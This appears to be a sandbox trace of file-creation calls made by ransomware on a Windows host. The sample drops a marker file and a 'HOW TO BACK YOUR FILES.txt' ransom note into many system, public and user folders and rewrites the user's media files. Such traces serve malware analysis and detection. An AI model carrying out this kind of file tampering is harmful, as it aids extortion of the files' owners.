Create C:\Windows10Upgrade\resources\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\hwcompatShared.txt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\i386\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\block.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\bluelogo.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\bullet.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default.css desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_eos.css desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_eos.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_oobe.css desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_oobe.htm desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\eula.css desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\GetStarted.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\loading.gif desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\lock.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\logo.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\marketing.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\pass.png desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Public\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Public\Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Public\Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Public\Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Public\Libraries\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Libraries\RecordedTV.library-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Libraries\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Public\Downloads\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Downloads\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Public\Documents\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Documents\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Public\Documents\My Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\Public\Documents\My Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Documents\My Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Public\Documents\My Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\Public\Documents\My Pictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Documents\My Pictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Public\Documents\My Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\Public\Documents\My Music\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Documents\My Music\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Public\Desktop\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\Desktop\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Public\AccountPictures\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\Public\AccountPictures\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\ntuser.dat.LOG1 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Desktop\ids.txt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ True 7
Fn
Create C:\Documents and Settings\FD1HVy\ntuser.dat.LOG2 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Documents and Settings\FD1HVy\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\gYIUr9Yr elVWW.avi desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\YWO_sNg OefAE_5w.avi desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\3tzadavEENh.mp4 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\EGhknK0b5TkYm2.mkv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\Jua Yx5oT-TmG.flv desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\MEEOu Zp.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\c2-bZv.mp4 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\WtGTr5oSkY4b2z.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\yfsh F2f2ESnkdaLoItR.mp4 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\YnRZ94SS8kLJlH.swf desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\_g-1teoG7j3v Y5dWV.mp4 desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\FD1HVy\Videos\9ons\4mqWI73rL\bWjMfEW6\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
